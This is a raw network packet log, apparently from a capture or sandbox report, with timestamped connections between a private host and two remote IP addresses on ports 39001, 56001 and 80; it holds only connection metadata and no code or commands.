Sep 19, 2024 02:25:33.919708967 CEST	49738	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:33.935368061 CEST	39001	49738	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:33.935425997 CEST	49738	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:33.942014933 CEST	39001	49738	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:34.531179905 CEST	39001	49738	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:34.531255960 CEST	49738	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:34.531378031 CEST	49738	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:34.536214113 CEST	39001	49738	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:34.642235041 CEST	49739	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:34.647800922 CEST	39001	49739	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:34.647891045 CEST	49739	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:34.660873890 CEST	49739	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:34.665939093 CEST	39001	49739	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:34.666003942 CEST	49739	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:34.670831919 CEST	39001	49739	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:35.306399107 CEST	39001	49739	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:35.306463003 CEST	49739	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:35.306641102 CEST	49739	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:35.311443090 CEST	39001	49739	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:35.423110962 CEST	49740	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:35.429012060 CEST	39001	49740	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:35.431435108 CEST	49740	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:35.443850994 CEST	49740	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:35.448694944 CEST	39001	49740	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:35.449482918 CEST	49740	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:35.454294920 CEST	39001	49740	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:36.078650951 CEST	39001	49740	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:36.078857899 CEST	49740	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:36.079051971 CEST	49740	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:36.083878994 CEST	39001	49740	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:36.189042091 CEST	49741	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:36.193880081 CEST	39001	49741	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:36.193984985 CEST	49741	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:36.208673954 CEST	49741	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:36.213495016 CEST	39001	49741	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:36.213623047 CEST	49741	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:36.218437910 CEST	39001	49741	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:36.392085075 CEST	80	49730	95.179.241.203	192.168.2.6
Sep 19, 2024 02:25:36.500452995 CEST	49730	80	192.168.2.6	95.179.241.203
Sep 19, 2024 02:25:36.824388027 CEST	39001	49741	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:36.824515104 CEST	49741	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:36.824688911 CEST	49741	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:36.829561949 CEST	39001	49741	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:36.938875914 CEST	49742	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:36.944293976 CEST	39001	49742	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:36.944451094 CEST	49742	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:36.979131937 CEST	49742	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:36.984260082 CEST	39001	49742	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:36.984342098 CEST	49742	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:36.989217043 CEST	39001	49742	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:37.616528034 CEST	39001	49742	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:37.616868973 CEST	49742	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:37.617088079 CEST	49742	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:37.621942043 CEST	39001	49742	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:37.744206905 CEST	49743	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:37.749512911 CEST	39001	49743	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:37.749607086 CEST	49743	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:37.777684927 CEST	49743	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:37.782602072 CEST	39001	49743	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:37.782741070 CEST	49743	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:37.787586927 CEST	39001	49743	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:38.542006969 CEST	39001	49743	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:38.542419910 CEST	49743	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:38.542648077 CEST	49743	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:38.547471046 CEST	39001	49743	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:38.657690048 CEST	49744	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:38.662674904 CEST	39001	49744	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:38.662755013 CEST	49744	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:38.676269054 CEST	49744	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:38.681073904 CEST	39001	49744	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:38.681121111 CEST	49744	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:38.685993910 CEST	39001	49744	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:39.314177990 CEST	39001	49744	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:39.314330101 CEST	49744	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:39.314399004 CEST	49744	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:39.319216967 CEST	39001	49744	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:39.423357964 CEST	49745	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:39.428616047 CEST	39001	49745	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:39.428692102 CEST	49745	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:39.442420959 CEST	49745	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:39.447650909 CEST	39001	49745	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:39.448008060 CEST	49745	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:39.453484058 CEST	39001	49745	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:40.098222017 CEST	39001	49745	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:40.098370075 CEST	49745	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:40.098488092 CEST	49745	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:40.103502989 CEST	39001	49745	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:40.228113890 CEST	49746	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:40.233316898 CEST	39001	49746	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:40.233675003 CEST	49746	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:40.246081114 CEST	49746	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:40.251308918 CEST	39001	49746	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:40.251358032 CEST	49746	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:40.256184101 CEST	39001	49746	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:40.893682003 CEST	39001	49746	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:40.894376040 CEST	49746	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:40.894592047 CEST	49746	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:40.899456024 CEST	39001	49746	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:41.001682997 CEST	49747	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:41.007698059 CEST	39001	49747	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:41.007780075 CEST	49747	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:41.019941092 CEST	49747	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:41.024797916 CEST	39001	49747	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:41.024849892 CEST	49747	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:41.029711008 CEST	39001	49747	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:41.660902023 CEST	39001	49747	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:41.660970926 CEST	49747	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:41.661107063 CEST	49747	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:41.665982008 CEST	39001	49747	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:41.766735077 CEST	49748	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:41.771719933 CEST	39001	49748	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:41.771795034 CEST	49748	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:41.786132097 CEST	49748	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:41.791065931 CEST	39001	49748	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:41.791134119 CEST	49748	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:41.796025991 CEST	39001	49748	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:42.402772903 CEST	39001	49748	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:42.402924061 CEST	49748	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:42.403135061 CEST	49748	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:42.408078909 CEST	39001	49748	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:42.517024040 CEST	49749	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:42.522263050 CEST	39001	49749	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:42.522378922 CEST	49749	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:42.536088943 CEST	49749	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:42.541162968 CEST	39001	49749	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:42.541244984 CEST	49749	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:42.546108007 CEST	39001	49749	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:43.836962938 CEST	39001	49749	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:43.837120056 CEST	39001	49749	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:43.837145090 CEST	49749	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:43.837146044 CEST	49749	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:43.837186098 CEST	49749	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:43.837392092 CEST	39001	49749	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:43.837444067 CEST	49749	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:43.842206955 CEST	39001	49749	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:43.954458952 CEST	49750	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:43.959556103 CEST	39001	49750	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:43.959641933 CEST	49750	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:43.973794937 CEST	49750	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:43.979163885 CEST	39001	49750	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:43.979253054 CEST	49750	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:43.990163088 CEST	39001	49750	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:44.597697973 CEST	39001	49750	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:44.597902060 CEST	49750	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:44.597974062 CEST	49750	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:44.602921009 CEST	39001	49750	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:44.611303091 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:44.616429090 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:44.616494894 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:44.621357918 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:44.712584019 CEST	49751	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:44.718245029 CEST	39001	49751	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:44.718323946 CEST	49751	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:44.733367920 CEST	49751	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:44.738224030 CEST	39001	49751	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:44.738272905 CEST	49751	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:44.743072033 CEST	39001	49751	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:45.065434933 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:45.203265905 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:45.203336954 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:45.210194111 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:45.215086937 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:45.215143919 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:45.219923973 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:45.353076935 CEST	39001	49751	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:45.353141069 CEST	49751	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:45.353276968 CEST	49751	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:45.358102083 CEST	39001	49751	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:45.470180988 CEST	49752	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:45.475945950 CEST	39001	49752	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:45.476039886 CEST	49752	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:45.489976883 CEST	49752	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:45.498058081 CEST	39001	49752	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:45.498126030 CEST	49752	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:45.503000021 CEST	39001	49752	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:46.121649027 CEST	39001	49752	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:46.122226954 CEST	49752	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:46.122401953 CEST	49752	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:46.127192974 CEST	39001	49752	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:46.235620975 CEST	49753	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:46.240489006 CEST	39001	49753	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:46.242444038 CEST	49753	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:46.258122921 CEST	49753	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:46.263025999 CEST	39001	49753	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:46.263468981 CEST	49753	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:46.268300056 CEST	39001	49753	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:46.724414110 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:46.844213009 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:46.859553099 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:46.865096092 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:46.870060921 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:46.870201111 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:46.875013113 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:46.889928102 CEST	39001	49753	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:46.889992952 CEST	49753	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:46.890229940 CEST	49753	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:46.894977093 CEST	39001	49753	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.001414061 CEST	49754	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.006409883 CEST	39001	49754	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.006488085 CEST	49754	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.022732019 CEST	49754	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.027561903 CEST	39001	49754	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.027622938 CEST	49754	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.032442093 CEST	39001	49754	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.389175892 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.389805079 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.389841080 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.389866114 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.389875889 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.389909029 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.389925003 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.389942884 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.390012026 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.390062094 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.390147924 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.390182018 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.390203953 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.390216112 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.390249968 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.390268087 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.390959978 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.391011000 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.391020060 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.391043901 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.391076088 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.391114950 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.480118036 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.480206013 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.480211973 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.480245113 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.480295897 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.480298042 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.480330944 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.480359077 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.480381012 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.480468988 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.480501890 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.480526924 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.480534077 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.480566025 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.480586052 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.481030941 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.481082916 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.481086016 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.481117964 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.481151104 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.481170893 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.481183052 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.481234074 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.481901884 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.481957912 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.481990099 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.482022047 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.482023001 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.482055902 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.482070923 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.482795000 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.482842922 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.482844114 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.482877016 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.482908010 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.482934952 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.482940912 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.483000994 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.483594894 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.483644962 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.483705044 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.570612907 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.570657015 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.570710897 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.570729971 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.570744038 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.570776939 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.570801020 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.570811987 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.570878983 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.571239948 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.571273088 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.571305990 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.571324110 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.571337938 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.571372032 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.571400881 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.571989059 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.572042942 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.572043896 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.572096109 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.572129011 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.572145939 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.572161913 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.572216034 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.572859049 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.572909117 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.572958946 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.572982073 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.572992086 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.573025942 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.573041916 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.573812962 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.573872089 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.573873043 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.573920965 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.573954105 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.573972940 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.573986053 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.574038029 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.574678898 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.574727058 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.574759960 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.574783087 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.574791908 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.574825048 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.574851990 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.575459003 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.575510979 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.575516939 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.575567007 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.575599909 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.575617075 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.575633049 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.575691938 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.576270103 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.576323032 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.576370955 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.576375008 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.576404095 CEST	56001	49712	45.11.229.96	192.168.2.6
